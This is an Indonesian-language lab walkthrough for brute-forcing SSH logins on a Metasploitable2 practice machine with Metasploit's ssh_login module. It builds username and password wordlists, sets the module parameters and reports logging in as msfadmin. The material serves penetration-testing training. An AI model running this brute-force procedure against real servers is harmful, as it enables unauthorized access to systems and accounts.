- Buat file dengan nano yang berisi daftar user untuk uji coba
nano user-metasploitable2.txt
- Isi file tersebut dengan daftar user sebagai berikut. Kemudian tekan
Ctrl+o
lalu enter
untuk menyimpan
root
admin
msfadmin
administrator
guest
user
test
postgres
oracle
- Buat file dengan nano yang berisi daftar password untuk uji coba
nano password-metasploitable2.txt
- Isi file tersebut dengan daftar password sebagai berikut. Kemudian tekan
Ctrl+O
lalu enter
untuk menyimpan
qwerty
1234
admin
12345
msfadmin
123123
12345678
- Buka msfconsole di terminal
- Cari modul untuk exploit SSH
- Gunakan modul
auxiliary/scanner/ssh/ssh_login
untuk brute force SSH login
use auxiliary/scanner/ssh/ssh_login
- Tampilkan daftar parameter yang dibutuhkan di modul tersebut
- Isi parameter yang dibutuhkan di modul tersebut
set RHOST <IP_metasploitable2>
set VERBOSE true
set USER_FILE /home/kali/user-metasploitable2.txt
set PASS_FILE /home/kali/password-metasploitable2.txt
set STOP_ON_SUCCESS true
- Setelah pengisian parameter selesai jalankan proses brute force. Disini kita berhasil login ke SSH dengan username msfadmin password msfadmin yang berada di session 1
- Disini kita berhasil masuk sebagai user
msfadmin